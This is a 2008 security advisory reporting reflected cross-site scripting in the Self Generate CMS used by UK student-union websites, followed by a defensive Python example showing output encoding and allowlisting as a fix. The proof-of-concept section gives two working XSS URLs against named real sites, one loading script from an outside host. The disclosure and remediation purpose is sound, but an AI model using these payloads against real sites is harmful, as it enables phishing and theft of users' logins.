selfgen-xss.txt

24 Aug 2008 00:00:00 | Reported by: Kaerast | Type: packetstorm | Source: packetstormsecurity.com

A vulnerability in the Self Generate CMS allows injection of arbitrary HTML/JavaScript code into a browser session, leading to potential phishing attacks.

`Release Date: August 23 2008  
Platform: Web  
Severity: Important  
Summary:  
  
Bam host a large number of websites for student unions throughout the  
uk using a custom cms system called Self Generate. This vulnerability  
affects all of these websites and allows attackers to inject arbitrary  
html/javascript code into a browser session.  
  
Status:  
  
We have been unable to contact BamUK, SU Marketing, or Self Generate  
about this vulnerability. They have no email addresses listed and their  
contact form consistently returns error messages.  
  
Details:  
  
There are various instances throughout the cms system where html code  
can be injected into the page. The majority of these instances are  
where ‘page’ is passed as a GET value, eg. page=injected_data, which is  
improperly cleaned before being displayed in the sidebar. Successful  
exploitation of this could lead to users giving away their login  
details through a cleverly crafted url sent in a phishing email.  
  
Poc:  
http://www.ubuonline.co.uk/games/?referrer=main&page=%22%3E%3Cscript%20src=http://vuln.xssed.net/thirdparty/scripts/ckers.org.js%3E%3C/script%3E  
  
http://www.hullstudent.com/content/?page=%22%3Cscript%3Ealert(document.location)%3C/script%3E&text_only=2  
  
Recommendations:  
  
Use existing contacts at Bam/Self Generate to ask whether your website  
is secure against all attacks (including xss and sql injection), and  
not just the ones we discovered today. We believe that since the code  
is heavily reused across all websites, it should be a relatively simple  
fix following a full code audit.  
  
Users may also consider switching to an alternative cms system hosted  
inhouse which would make security auditing and fixing of bugs like  
these much easier.  
  
--   
Kærast  
  
`
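The advisory's Details section describes a `page` GET value reaching the sidebar without proper cleaning. The following is an added example, not code from the advisory or from the Self Generate CMS (whose source is not shown): it contrasts that pattern with allowlisting plus context-aware output encoding. The function names, the page allowlist and the `cms.example` host are hypothetical.

```python
import html
from urllib.parse import parse_qs, quote, urlsplit

# Constructed allowlist; the CMS's real page names are not given in the advisory.
KNOWN_PAGES = {"home", "events", "games"}
DEFAULT_PAGE = "home"

# Constructed URL: placeholder host, query string in the shape of the advisory's PoC.
SAMPLE_URL = ("http://cms.example/content/"
              "?page=%22%3Cscript%3Ealert(document.location)%3C/script%3E&text_only=2")


def get_page_param(url):
    """Return the URL-decoded 'page' value, as a web framework would hand it over."""
    return parse_qs(urlsplit(url).query, keep_blank_values=True).get("page", [""])[0]


def sidebar_unsafe(page):
    """The flaw as described: the value is concatenated into markup unencoded."""
    return '<li><a href="?page=' + page + '">' + page + "</a></li>"


def sidebar_encoded(page):
    """Output encoding per context: URL-encode for the query string, then
    HTML-escape (quote=True also covers the attribute delimiter)."""
    href = html.escape("?page=" + quote(page, safe=""), quote=True)
    return f'<li><a href="{href}">{html.escape(page, quote=True)}</a></li>'


def sidebar_safe(page):
    """Allowlist first, then encode anyway so a later allowlist change stays safe."""
    if page not in KNOWN_PAGES:
        page = DEFAULT_PAGE
    return sidebar_encoded(page)


if __name__ == "__main__":
    value = get_page_param(SAMPLE_URL)
    for render in (sidebar_unsafe, sidebar_encoded, sidebar_safe):
        print(f"{render.__name__:16} {render(value)}")
```

Encoding alone already renders the injected markup as inert text; the allowlist additionally stops unknown page names from being reflected at all.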
